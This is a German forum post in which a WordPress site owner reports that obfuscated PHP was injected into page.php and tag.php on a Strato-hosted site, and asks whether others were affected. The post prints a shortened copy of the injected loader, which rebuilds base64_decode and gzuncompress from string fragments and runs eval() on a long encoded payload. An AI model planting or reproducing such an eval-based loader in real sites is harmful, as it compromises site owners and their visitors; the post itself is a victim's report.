Am 24.10. wurden bei einer wordpress Site folgende Zeilen an den Anfang der page.php und tag.php eingefügt (stark gekürzt ).
PHP
<?php $linedup = array("4_decode","base6"); $grep_ = array("gzunco","mpress") ; $stips = array('eNp1WWtv4','koS/Sv','3w0gzo1ztNTZ','kbF3lQ0jAQIAQQ4zt1WrlB2','DABm','cI+LHa/77','dp9ptk','pmVItNu96PqV','NWp6s76fAjft8fDH9Eq/PZl','+/0/','X/y7+58//','fLb169','/fg2+/vGPr+a','UP4+BQ7+h089DM8nclL+e7t','gwb8','mbRrna3N3','Vsxz+6','FYBdfGXcNDnP','wfX6f4M1E4ZaiMlUqeHesbg','WI90','8rvfNCMtP','nmHEW8','WvmmXvBGoxdl','TrV2oTn+GmzveVQ/3NLviv/','4BYv','PuUOXNTKv','X7hch/',
....
/vAwHIlwu1G','eSQy','fvQ9s0joJ','Xrdq6H','JKMJ/zUaSj9r','L+gHTp56wsyU0O1qUv6PrA9','N/Ey','Nlk7HZR10','1sJj3X','hiS9MBWAobUX','nJ6I4nnhBbWhd6r8QMQE0H4','+YuH','whYuJpL2L','iOir3v','mhI9AcNndJbC','ZKcDm/NKOFKE4ZOntxEDE7y','kRIU','cXW7UrsP2','3kXmsb','QWn8fOo+87eY','iBeN2rLT5sLRnTDuGTqTO0K','n8f+','e1joVz8Dh','frNf47','ZndH0P7p2UHZ','rnsfnTjPr6x1qsLv4Y2bZlJ','gu5z','3D4bZ1flm','atDCX/','UitHEW6ikjyi','SYQOlkvSoufSth4xoZ0KPrm','Evst','HO20iCQR/','Tg6P71','GTob8V/+zb3r','5TQ+D9jg5yJ'); $black = $linedup[1].$linedup[0]; eval($blue($black(implode("", $stips)))); eval($blue($black(implode("", $white)))); ?>
Die Seite wurde dadurch erstmal lahm gelegt (u.a. betrug das memory limit nur noch 16MB). Laut strato waren eine Reihe weiterer Wordpress Seiten betroffen.
Hat jemand Infos dazu oder weiss, ob diese Sicherheitslücke nur bei Strato auftrat oder auch anderswo?
Die Dateien hatten nur Schreibrechte für den Besitzer CHMOD 644)